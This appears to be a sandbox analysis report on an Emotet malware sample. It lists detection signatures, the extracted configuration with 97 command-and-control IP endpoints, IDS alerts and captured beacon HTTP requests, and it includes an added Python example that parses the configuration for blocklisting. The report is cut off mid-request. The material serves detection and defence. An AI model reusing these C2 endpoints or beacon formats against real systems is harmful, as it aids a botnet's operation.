Windows Analysis Report
ExeFile (356).exe

Overview

General Information

Sample name: ExeFile (356).exe
Analysis ID: 1495910
MD5: 4c1c997c16309a2d391e1d39988000cc
SHA1: 199ebff853acd5f3209ea81c75d48d1db20334cc
SHA256: c37ae465ddd63d49f36380cf223d1b0d3117021190d73bc37ee132ec10020342
Tags: Emotet, Heodo

Detection

Family: Emotet
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Emotet
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Connects to several IPs in different countries
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ExeFile (356).exe (PID: 6640, cmdline: "C:\Users\user\Desktop\ExeFile (356).exe", MD5: 4C1C997C16309A2D391E1D39988000CC)
    • Websocket.exe (PID: 6716, cmdline: "C:\Windows\SysWOW64\provcore\Websocket.exe", MD5: 4C1C997C16309A2D391E1D39988000CC)
  • svchost.exe (PID: 6240, cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
Name: Emotet
Description: While Emotet historically was banking malware organized in a botnet, nowadays it is mostly seen as infrastructure-as-a-service for content delivery. For example, since mid-2018 it has been used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It still steals information from victims, but the criminal gang behind it opened another business channel by selling its infrastructure to deliver additional malicious software. Malware analysts classify it into epochs depending on command and control, payloads, and delivery solutions, which change over time. Emotet was taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
Attribution:
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
Extracted malware configuration (Emotet):
{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["71.72.196.159:80", "134.209.36.254:8080", "120.138.30.150:8080", "94.23.216.33:80", "157.245.99.39:8080", "137.59.187.107:8080", "94.23.237.171:443", "61.19.246.238:443", "156.155.166.221:80", "50.35.17.13:80", "153.137.36.142:80", "91.211.88.52:7080", "209.141.54.221:8080", "185.94.252.104:443", "174.45.13.118:80", "87.106.136.232:8080", "62.75.141.82:80", "213.196.135.145:80", "188.219.31.12:80", "82.80.155.43:80", "187.161.206.24:80", "172.91.208.86:80", "124.41.215.226:80", "107.5.122.110:80", "200.123.150.89:443", "95.179.229.244:8080", "83.169.36.251:8080", "1.221.254.82:80", "95.213.236.64:8080", "181.169.34.190:80", "47.144.21.12:443", "203.153.216.189:7080", "89.216.122.92:80", "84.39.182.7:80", "94.200.114.161:80", "104.236.246.93:8080", "139.99.158.11:443", "176.111.60.55:8080", "78.24.219.147:8080", "220.245.198.194:80", "62.30.7.67:443", "139.162.108.71:8080", "104.32.141.43:80", "153.232.188.106:80", "93.147.212.206:80", "79.137.83.50:443", "96.249.236.156:443", "24.43.99.75:80", "75.80.124.4:80", "42.200.107.142:80", "110.5.16.198:80", "5.196.74.210:8080", "110.145.77.103:80", "200.114.213.233:8080", "85.152.162.105:80", "5.39.91.110:7080", "109.74.5.95:8080", "140.186.212.146:80", "37.187.72.193:8080", "97.82.79.83:80", "139.130.242.43:80", "201.173.217.124:443", "123.176.25.234:80", "104.131.44.150:8080", "74.208.45.104:8080", "139.59.60.244:8080", "120.150.60.189:80", "74.219.172.26:80", "219.75.128.166:80", "82.225.49.121:80", "85.105.205.77:8080", "24.179.13.119:80", "74.120.55.163:80", "174.102.48.180:443", "219.74.18.66:443", "168.235.67.138:7080", "194.187.133.160:443", "78.187.156.31:80", "103.86.49.11:8080", "61.92.17.12:80", "24.137.76.62:80", "104.131.11.150:443", "79.98.24.39:8080", "75.139.38.211:80", "162.241.242.173:8080", "195.251.213.56:80", "37.139.21.175:8080", "46.105.131.79:8080", "50.91.114.38:80", "121.124.124.40:7080", "74.134.41.124:80", "68.188.112.97:80", "137.119.36.33:80", "121.7.127.163:80", "87.106.139.101:8080", "94.1.108.190:443", "169.239.182.217:8080"]}
Yara matches in memory dumps (Source | Rule | Description | Author | Strings):
  • 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
  • 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Emotet_5528b3b0 | unknown | unknown | 0x31dc:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
  • 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
  • 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Emotet_5528b3b0 | unknown | unknown | 0x31dc:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
  • 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
  (7 further memory-dump matches not shown)

Yara matches in unpacked PE files (Source | Rule | Description | Author | Strings):
  • 2.2.Websocket.exe.60279e.2.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
  • 2.2.Websocket.exe.60279e.2.raw.unpack | Windows_Trojan_Emotet_5528b3b0 | unknown | unknown | 0x316c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
  • 0.2.ExeFile (356).exe.5f279e.3.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
  • 0.2.ExeFile (356).exe.5f279e.3.raw.unpack | Windows_Trojan_Emotet_5528b3b0 | unknown | unknown | 0x316c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
  • 0.2.ExeFile (356).exe.5f279e.3.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
  (15 further unpacked-PE matches not shown)

              System Summary

Sigma matches:
  • Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 134.209.36.254, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\SysWOW64\provcore\Websocket.exe, Initiated: true, ProcessId: 6716, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49722
  • Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 6240, ProcessName: svchost.exe
Suricata alerts (all SID 2854388, Severity 1, Protocol TCP, Classtype: Malware Command and Control Activity Detected):
  Timestamp                          Source Port   Destination Port
  2024-08-20T17:47:30.327401+0200    49723         8080
  2024-08-20T17:48:48.814321+0200    62418         80
  2024-08-20T17:47:03.074373+0200    62404         443
  2024-08-20T17:48:53.453903+0200    62419         8080
  2024-08-20T17:47:59.609413+0200    49726         8080
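The following is an added worked example, written for this page rather than taken from Joe Sandbox or from the sample, that does what an analyst usually does next with the three artefacts above: it parses the extracted configuration (same two keys as the extractor output; the C2 list is a constructed, shortened copy with six of the 97 entries), walks the DER of the RSA public key with a minimal hand-written TLV reader to recover the modulus size and public exponent (768 bits and 65537 for this key), applies the same "communication to uncommon destination port" idea as the Sigma hit to the C2 list, and intersects the list with the destinations named in three Suricata alert lines copied from the Networking section of this report. The TLV reader assumes a standard SubjectPublicKeyInfo, which the base64 prefix of the key indicates; the function names and the shortened list are this example's own.

```python
import base64
import json
import re
from collections import Counter

# Constructed copy of the "Malware Configuration Extractor" output above (same two keys);
# the C2 list is shortened to six of the 97 entries so the example stays readable.
EXTRACTED_CONFIG = json.dumps({
    "RSA Public Key": (
        "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\n"
        "Q0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\n"
        "fkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"
    ),
    "C2 list": [
        "71.72.196.159:80", "134.209.36.254:8080", "94.23.237.171:443",
        "91.211.88.52:7080", "120.138.30.150:8080", "61.19.246.238:443",
    ],
})

# Three Suricata summary lines copied from the Networking section of this report.
ALERT_LINES = [
    "2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49723 -> 120.138.30.150:8080",
    "2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62405 -> 61.19.246.238:443",
    "2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49722 -> 134.209.36.254:8080",
]

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1
SURICATA_FLOW = re.compile(r"(\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)")


def _der_tlv(buf, pos):
    """Read one DER tag-length-value at pos; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long-form length: low bits = number of length bytes
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def rsa_public_key_info(config_json):
    """Decode the base64 SubjectPublicKeyInfo and return modulus size (bits) and public exponent."""
    cfg = json.loads(config_json)
    der = base64.b64decode("".join(cfg["RSA Public Key"].split()))  # drop the embedded newlines
    tag, spki, _ = _der_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, alg_id, pos = _der_tlv(spki, 0)             # AlgorithmIdentifier
    _, oid, _ = _der_tlv(alg_id, 0)
    if oid != RSA_ENCRYPTION_OID:
        raise ValueError("not an rsaEncryption key")
    _, bit_string, _ = _der_tlv(spki, pos)         # BIT STRING; first byte = unused-bit count
    _, rsa_pub, _ = _der_tlv(bit_string[1:], 0)    # RSAPublicKey ::= SEQUENCE { n, e }
    _, modulus, pos = _der_tlv(rsa_pub, 0)
    _, exponent, _ = _der_tlv(rsa_pub, pos)
    return {
        "modulus_bits": int.from_bytes(modulus, "big").bit_length(),
        "exponent": int.from_bytes(exponent, "big"),
    }


def c2_endpoints(config_json):
    """Return the C2 list as (ip, port) tuples, preserving the extractor's order."""
    endpoints = []
    for entry in json.loads(config_json)["C2 list"]:
        ip, _, port = entry.rpartition(":")
        endpoints.append((ip, int(port)))
    return endpoints


def port_histogram(endpoints):
    return Counter(port for _, port in endpoints)


def uncommon_port_endpoints(endpoints, common=(80, 443)):
    """Endpoints a 'communication to uncommon destination port' rule would single out."""
    return [(ip, port) for ip, port in endpoints if port not in common]


def contacted_endpoints(endpoints, alert_lines):
    """Which configured C2s actually appear as destinations in the Suricata alert lines."""
    seen = set()
    for line in alert_lines:
        m = SURICATA_FLOW.search(line)
        if m:
            seen.add((m.group(3), int(m.group(4))))
    return [ep for ep in endpoints if ep in seen]


if __name__ == "__main__":
    key = rsa_public_key_info(EXTRACTED_CONFIG)
    eps = c2_endpoints(EXTRACTED_CONFIG)
    print(f"RSA modulus: {key['modulus_bits']} bits, e = {key['exponent']}")
    print("port histogram:", dict(port_histogram(eps)))
    print("uncommon-port C2s:", uncommon_port_endpoints(eps))
    print("C2s confirmed by Suricata:", contacted_endpoints(eps, ALERT_LINES))
```

Running it against the full 97-entry list instead of the shortened one gives the same kind of output: a port histogram dominated by 80 and 8080 with a tail of 443 and 7080, and a short list of endpoints the sandbox run actually reached, which is the subset worth prioritising in a blocklist.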

              AV Detection

Source: ExeFile (356).exe | Avira: detected
Source: 2.2.Websocket.exe.610000.4.unpack | Malware Configuration Extractor: Emotet (RSA public key and 97-entry C2 list as given in the extracted configuration above)
Source: ExeFile (356).exe | ReversingLabs: Detection: 97%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.9% probability
Source: ExeFile (356).exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_006125A0 CryptAcquireContextW,CryptImportKey,LocalFree,CryptCreateHash,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_00612210 CryptDestroyHash,CryptExportKey,CryptDuplicateHash,CryptGetHashParam,CryptEncrypt,memcpy,GetProcessHeap,HeapFree
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_00611FA0 CryptDuplicateHash,CryptDestroyHash,memcpy
Source: ExeFile (356).exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: A:\WindowsProcessManager-master\WindowsProcessManager-master\Release\TaskMgr.pdb | source: ExeFile (356).exe
Source: Binary string: vfwwdm32.pdb | source: ExeFile (356).exe
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function: 0_2_006038B0 GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_006138B0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose

              Networking

Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49723 -> 120.138.30.150:8080
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49723 -> 120.138.30.150:8080
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62418 -> 174.45.13.118:80
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62418 -> 174.45.13.118:80
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49726 -> 137.59.187.107:8080
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49726 -> 137.59.187.107:8080
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62419 -> 87.106.136.232:8080
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62419 -> 87.106.136.232:8080
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62408 -> 153.137.36.142:80
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62408 -> 153.137.36.142:80
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62405 -> 61.19.246.238:443
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49724 -> 94.23.216.33:80
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49724 -> 94.23.216.33:80
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62406 -> 156.155.166.221:80
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62409 -> 91.211.88.52:7080
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62409 -> 91.211.88.52:7080
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62407 -> 50.35.17.13:80
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62407 -> 50.35.17.13:80
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49712 -> 71.72.196.159:80
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49712 -> 71.72.196.159:80
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62420 -> 62.75.141.82:80
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62420 -> 62.75.141.82:80
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49725 -> 157.245.99.39:8080
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49725 -> 157.245.99.39:8080
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49722 -> 134.209.36.254:8080
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49722 -> 134.209.36.254:8080
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62410 -> 209.141.54.221:8080
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62410 -> 209.141.54.221:8080
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62411 -> 185.94.252.104:443
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62411 -> 185.94.252.104:443
Source: Network traffic | Suricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62404 -> 94.23.237.171:443
Source: Network traffic | Suricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62404 -> 94.23.237.171:443
Source: Malware configuration extractor | IPs (97 C2 endpoints, the same list as in the extracted configuration): 71.72.196.159:80, 134.209.36.254:8080, 120.138.30.150:8080, 94.23.216.33:80, 157.245.99.39:8080, 137.59.187.107:8080, 94.23.237.171:443, 61.19.246.238:443, 156.155.166.221:80, 50.35.17.13:80, 153.137.36.142:80, 91.211.88.52:7080, 209.141.54.221:8080, 185.94.252.104:443, 174.45.13.118:80, 87.106.136.232:8080, 62.75.141.82:80, 213.196.135.145:80, 188.219.31.12:80, 82.80.155.43:80, 187.161.206.24:80, 172.91.208.86:80, 124.41.215.226:80, 107.5.122.110:80, 200.123.150.89:443, 95.179.229.244:8080, 83.169.36.251:8080, 1.221.254.82:80, 95.213.236.64:8080, 181.169.34.190:80, 47.144.21.12:443, 203.153.216.189:7080, 89.216.122.92:80, 84.39.182.7:80, 94.200.114.161:80, 104.236.246.93:8080, 139.99.158.11:443, 176.111.60.55:8080, 78.24.219.147:8080, 220.245.198.194:80, 62.30.7.67:443, 139.162.108.71:8080, 104.32.141.43:80, 153.232.188.106:80, 93.147.212.206:80, 79.137.83.50:443, 96.249.236.156:443, 24.43.99.75:80, 75.80.124.4:80, 42.200.107.142:80, 110.5.16.198:80, 5.196.74.210:8080, 110.145.77.103:80, 200.114.213.233:8080, 85.152.162.105:80, 5.39.91.110:7080, 109.74.5.95:8080, 140.186.212.146:80, 37.187.72.193:8080, 97.82.79.83:80, 139.130.242.43:80, 201.173.217.124:443, 123.176.25.234:80, 104.131.44.150:8080, 74.208.45.104:8080, 139.59.60.244:8080, 120.150.60.189:80, 74.219.172.26:80, 219.75.128.166:80, 82.225.49.121:80, 85.105.205.77:8080, 24.179.13.119:80, 74.120.55.163:80, 174.102.48.180:443, 219.74.18.66:443, 168.235.67.138:7080, 194.187.133.160:443, 78.187.156.31:80, 103.86.49.11:8080, 61.92.17.12:80, 24.137.76.62:80, 104.131.11.150:443, 79.98.24.39:8080, 75.139.38.211:80, 162.241.242.173:8080, 195.251.213.56:80, 37.139.21.175:8080, 46.105.131.79:8080, 50.91.114.38:80, 121.124.124.40:7080, 74.134.41.124:80, 68.188.112.97:80, 137.119.36.33:80, 121.7.127.163:80, 87.106.139.101:8080, 94.1.108.190:443, 169.239.182.217:8080
Source: unknown | Network traffic detected: HTTP traffic on port 62409 -> 7080
Source: unknown | Network traffic detected: IP country count 32
Source: global traffic | TCP traffic: 192.168.2.12:49722 -> 134.209.36.254:8080
Source: global traffic | TCP traffic: 192.168.2.12:49723 -> 120.138.30.150:8080
Source: global traffic | TCP traffic: 192.168.2.12:49725 -> 157.245.99.39:8080
Source: global traffic | TCP traffic: 192.168.2.12:49726 -> 137.59.187.107:8080
Source: global traffic | TCP traffic: 192.168.2.12:62409 -> 91.211.88.52:7080
Source: global traffic | TCP traffic: 192.168.2.12:62410 -> 209.141.54.221:8080
Source: global traffic | TCP traffic: 192.168.2.12:62419 -> 87.106.136.232:8080
Source: Joe Sandbox View | IP Address: 94.200.114.161
Source: Joe Sandbox View | IP Address: 71.72.196.159
Source: Joe Sandbox View | IP Address: 85.152.162.105
Source: Joe Sandbox View | ASN Name: DU-AS1AE
Source: Joe Sandbox View | ASN Name: TWC-10796-MIDWESTUS
Source: Joe Sandbox View | ASN Name: TELECABLESpainES
Source: Joe Sandbox View | ASN Name: TWC-10796-MIDWESTUS
Source: global traffic | HTTP traffic detected:
  POST /U79iM382/IZ04Joc/eLC1daPUos8/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 71.72.196.159/U79iM382/IZ04Joc/eLC1daPUos8/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=------------cs4fTNfbtTQb
  Host: 71.72.196.159
  Content-Length: 4660
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /T5Vg4Qw6cjD/Ig1s2FXtpuz/TQ9zRX6lxh/onfM1cXpehs4Ys/zuNlQfl2ySC/vyKTBvDcyugOiz5nO8/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 134.209.36.254/T5Vg4Qw6cjD/Ig1s2FXtpuz/TQ9zRX6lxh/onfM1cXpehs4Ys/zuNlQfl2ySC/vyKTBvDcyugOiz5nO8/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=--------------mk75J6XmW2R3bq
  Host: 134.209.36.254:8080
  Content-Length: 4660
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /3c7L3qI9O7w/Rm0uJBYq9TtaH/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 120.138.30.150/3c7L3qI9O7w/Rm0uJBYq9TtaH/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=---------------VnrwklFt5SvgEBv
  Host: 120.138.30.150:8080
  Content-Length: 4660
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /4sERDG3EhH4jL/eJgQIlw4kZ/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 94.23.216.33/4sERDG3EhH4jL/eJgQIlw4kZ/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=-----------------dNvw9ZmlFxNAzGF12
  Host: 94.23.216.33
  Content-Length: 4660
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 157.245.99.39/iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=----------------------0xXrF4Ymva2woSLWTDYnAi
  Host: 157.245.99.39:8080
  Content-Length: 4660
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /JN2DplxF92Pi/qZ21yDZ4M/ris4gHcOGLF4hcPHwQ/A1nU/6tibZPGO3hJC/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 137.59.187.107/JN2DplxF92Pi/qZ21yDZ4M/ris4gHcOGLF4hcPHwQ/A1nU/6tibZPGO3hJC/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=----------------yA0yv22gQqHz91Fm
  Host: 137.59.187.107:8080
  Content-Length: 4660
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 94.23.237.171/QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=--------------------8l9iSdFwjKbTCnC5XLPO
  Host: 94.23.237.171:443
  Content-Length: 4628
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /Gm1WL3Kb/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
